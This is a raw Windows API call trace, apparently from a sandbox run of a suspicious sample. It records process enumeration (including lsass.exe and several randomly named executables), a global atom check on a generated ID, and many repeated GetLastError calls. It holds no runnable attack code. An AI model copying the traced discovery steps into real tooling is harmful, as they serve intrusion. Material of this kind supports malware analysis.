	[0128.045] GetLastError () returned 0x5
	[0128.045] GetLastError () returned 0x5
	[0128.045] GetLastError () returned 0x5
	[0128.045] GetLastError () returned 0x5
	[0128.045] GetLastError () returned 0x5
	[0128.045] GetLastError () returned 0x5
	[0128.045] GetLastError () returned 0x5
	[0128.045] GetLastError () returned 0x5
	[0128.045] GetLastError () returned 0x5
	[0128.045] GetLastError () returned 0x5
	[0128.045] GetLastError () returned 0x5
	[0128.045] GetLastError () returned 0x5
	[0128.045] GetLastError () returned 0x5
	[0128.045] GetLastError () returned 0x5
	[0128.045] GetLastError () returned 0x5
	[0128.045] GetLastError () returned 0x5
	[0128.045] GetLastError () returned 0x5
	[0128.045] GetLastError () returned 0x5
	[0128.046] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0128.046] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0128.046] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0128.046] GetLastError () returned 0x5
	[0128.046] GetLastError () returned 0x5
	[0128.046] GetLastError () returned 0x5
	[0128.046] GetLastError () returned 0x5
	[0128.046] GetLastError () returned 0x5
	[0128.046] GetLastError () returned 0x5
	[0128.046] GetLastError () returned 0x5
	[0128.046] GetLastError () returned 0x5
	[0128.046] GetLastError () returned 0x5
	[0128.046] GetLastError () returned 0x5
	[0128.046] GetLastError () returned 0x5
	[0128.046] GetLastError () returned 0x5
	[0128.046] GetLastError () returned 0x5
	[0128.046] GetLastError () returned 0x5
	[0128.046] GetLastError () returned 0x5
	[0128.046] GetLastError () returned 0x5
	[0128.046] GetLastError () returned 0x5
	[0128.046] GetLastError () returned 0x5
	[0128.046] GetLastError () returned 0x5
	[0128.046] GetLastError () returned 0x5
	[0128.046] GetLastError () returned 0x5
	[0128.046] GetLastError () returned 0x5
	[0128.046] GetLastError () returned 0x5
	[0128.046] GetLastError () returned 0x5
	[0128.046] GetLastError () returned 0x5
	[0128.047] GetLastError () returned 0x5
	[0128.047] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0128.047] GetLastError () returned 0x5
	[0128.047] GetLastError () returned 0x5
	[0128.047] GetLastError () returned 0x5
	[0128.047] GetLastError () returned 0x5
	[0128.047] GetLastError () returned 0x5
	[0128.047] GetLastError () returned 0x5
	[0128.047] GetLastError () returned 0x5
	[0128.047] GetLastError () returned 0x5
	[0128.047] GetLastError () returned 0x5
	[0128.047] GetLastError () returned 0x5
	[0128.047] GetLastError () returned 0x5
	[0128.047] GetLastError () returned 0x5
	[0128.047] GetLastError () returned 0x5
	[0128.047] GetLastError () returned 0x5
	[0128.047] GetLastError () returned 0x5
	[0128.047] GetLastError () returned 0x5
	[0128.047] GetLastError () returned 0x5
	[0128.047] GetLastError () returned 0x5
	[0128.047] GetLastError () returned 0x5
	[0128.047] GetLastError () returned 0x5
	[0128.047] GetLastError () returned 0x5
	[0128.047] GetLastError () returned 0x5
	[0128.047] GetLastError () returned 0x5
	[0128.047] GetLastError () returned 0x5
	[0128.047] GetLastError () returned 0x5
	[0128.047] GetLastError () returned 0x5
	[0128.047] GetLastError () returned 0x5
	[0128.047] GetLastError () returned 0x5
	[0128.047] GetLastError () returned 0x5
	[0128.047] GetLastError () returned 0x5
	[0128.047] GetLastError () returned 0x5
	[0128.047] GetLastError () returned 0x5
	[0128.047] GetLastError () returned 0x5
	[0128.047] GetLastError () returned 0x5
	[0128.047] GetLastError () returned 0x5
	[0128.047] GetLastError () returned 0x5
	[0128.047] GetLastError () returned 0x5
	[0128.047] GetLastError () returned 0x5
	[0128.047] GetLastError () returned 0x5
	[0128.047] GetLastError () returned 0x5
	[0128.047] GetLastError () returned 0x5
	[0128.047] GetLastError () returned 0x5
	[0128.048] GetLastError () returned 0x5
	[0128.048] GetLastError () returned 0x5
	[0128.048] GetLastError () returned 0x5
	[0128.048] GetLastError () returned 0x5
	[0128.048] GetLastError () returned 0x5
	[0128.048] GetLastError () returned 0x5
	[0128.048] GetLastError () returned 0x5
	[0128.048] GetLastError () returned 0x5
	[0128.048] GetLastError () returned 0x5
	[0128.048] GetLastError () returned 0x5
	[0128.048] GetLastError () returned 0x5
	[0128.048] GetLastError () returned 0x5
	[0128.048] GetLastError () returned 0x5
	[0128.048] GetLastError () returned 0x5
	[0128.048] GetLastError () returned 0x5
	[0128.048] GetLastError () returned 0x5
	[0128.048] GetLastError () returned 0x5
	[0128.048] GetLastError () returned 0x5
	[0128.048] GetLastError () returned 0x5
	[0128.048] GetLastError () returned 0x5
	[0128.048] GetLastError () returned 0x5
	[0128.048] GetLastError () returned 0x5
	[0128.048] GetLastError () returned 0x5
	[0128.048] GetLastError () returned 0x5
	[0128.048] GetLastError () returned 0x5
	[0128.048] GetLastError () returned 0x5
	[0128.048] GetLastError () returned 0x5
	[0128.048] GetLastError () returned 0x5
	[0128.048] GetLastError () returned 0x5
	[0128.048] GetLastError () returned 0x5
	[0128.048] GetLastError () returned 0x5
	[0128.048] GetLastError () returned 0x5
	[0128.048] GetLastError () returned 0x5
	[0128.048] GetLastError () returned 0x5
	[0128.048] GetLastError () returned 0x5
	[0128.048] GetLastError () returned 0x5
	[0128.048] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0128.049] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0128.049] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0128.049] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0128.049] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0128.049] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0128.049] CloseHandle (hObject=0x2dc) returned 1
	[0128.049] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0128.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b59e8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x2dc
	[0128.050] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.050] CloseHandle (hObject=0x2dc) returned 1
	[0128.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0128.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x2dc
	[0128.050] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.050] CloseHandle (hObject=0x2dc) returned 1
	[0128.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0128.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x2dc
	[0128.051] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.051] CloseHandle (hObject=0x2dc) returned 1
	[0128.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb0) returned 0x2dc
	[0128.051] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.051] CloseHandle (hObject=0x2dc) returned 1
	[0128.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5a78, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0128.052] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x2dc
	[0128.052] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.052] CloseHandle (hObject=0x2dc) returned 1
	[0128.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0128.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0128.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0128.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0128.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0128.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0128.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0128.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0128.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0128.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0128.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0128.088] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0128.088] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0128.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0128.088] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0128.089] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0128.089] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0128.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0128.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0128.091] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0128.091] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0128.091] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x2dc
	[0128.092] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.092] CloseHandle (hObject=0x2dc) returned 1
	[0128.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5970, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0128.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0128.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0128.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x2dc
	[0128.093] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.093] CloseHandle (hObject=0x2dc) returned 1
	[0128.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d128, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0128.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0128.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2dc
	[0128.094] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.094] CloseHandle (hObject=0x2dc) returned 1
	[0128.094] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x2dc
	[0128.094] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.094] CloseHandle (hObject=0x2dc) returned 1
	[0128.094] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x2dc
	[0128.094] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.094] CloseHandle (hObject=0x2dc) returned 1
	[0128.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5c10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.095] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x2dc
	[0128.095] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.095] CloseHandle (hObject=0x2dc) returned 1
	[0128.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0128.095] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x2dc
	[0128.095] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.095] CloseHandle (hObject=0x2dc) returned 1
	[0128.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.096] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x2dc
	[0128.096] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.096] CloseHandle (hObject=0x2dc) returned 1
	[0128.096] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.096] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0128.096] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b5b38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.096] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x2dc
	[0128.096] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.096] CloseHandle (hObject=0x2dc) returned 1
	[0128.097] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.097] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x2dc
	[0128.097] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.097] CloseHandle (hObject=0x2dc) returned 1
	[0128.097] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.097] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x2dc
	[0128.097] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.097] CloseHandle (hObject=0x2dc) returned 1
	[0128.097] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0128.098] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x2dc
	[0128.098] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.098] CloseHandle (hObject=0x2dc) returned 1
	[0128.098] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d5f8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0128.098] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x2dc
	[0128.098] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.098] CloseHandle (hObject=0x2dc) returned 1
	[0128.098] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0128.098] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x2dc
	[0128.098] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.098] CloseHandle (hObject=0x2dc) returned 1
	[0128.099] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b98c0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0128.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x2dc
	[0128.099] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.099] CloseHandle (hObject=0x2dc) returned 1
	[0128.099] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0128.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x2dc
	[0128.099] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.099] CloseHandle (hObject=0x2dc) returned 1
	[0128.099] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.100] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x2dc
	[0128.100] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.100] CloseHandle (hObject=0x2dc) returned 1
